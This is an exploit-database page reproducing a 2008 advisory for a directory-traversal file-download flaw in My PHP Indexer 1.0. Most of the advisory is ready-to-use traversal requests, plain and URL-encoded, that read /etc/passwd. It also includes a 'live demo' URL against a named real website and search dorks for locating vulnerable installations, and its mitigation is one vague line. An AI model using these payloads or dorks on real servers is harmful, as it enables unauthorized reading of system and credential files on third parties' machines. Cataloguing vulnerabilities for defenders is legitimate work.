header-logo
Suggest Exploit
vendor:
My PHP Indexer
by:
JosS
6.4
CVSS
MEDIUM
Local File Download
22
CWE
Product Name: My PHP Indexer
Affected Version From: 1
Affected Version To: 1
Patch Exists: N/A
Related CWE: N/A
CPE: a:myphpindexer:my_php_indexer:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

My PHP Indexer 1.0 (index.php) Local File Download Vulnerability

Depending the server configuration is possible that it doesn't allow us to scale directories. The PoC is /index.php?d=[DIR]&f=[FILE] and the exploit is /index.php?d=../../../../../../../../../../../etc/&f=passwd or /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd. A live demo is http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php and the dorks are "Powered by My PHP Indexer 1.0" and "priv8 :P".

Mitigation:

Ensure that the server configuration does not allow directory traversal.
Source

Exploit-DB raw data:

# My PHP Indexer 1.0 (index.php) Local File Download Vulnerability
# url: http://sourceforge.net/projects/myphpindexer/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

-----------------------------------------------
Depending the server configuration is possible 
that it doesn't allow us to scale directories.
-----------------------------------------------

vuln file: index.php

PoC:     /index.php?d=[DIR]&f=[FILE]
Exploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd
         /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd

live demo:
[PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f)
[FILE] = index.php;
http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php

dork:     "Powered by My PHP Indexer 1.0"
dork (2): "priv8 :P"

# milw0rm.com [2008-10-12]

Navigation

Suggest Exploit

Services By CQR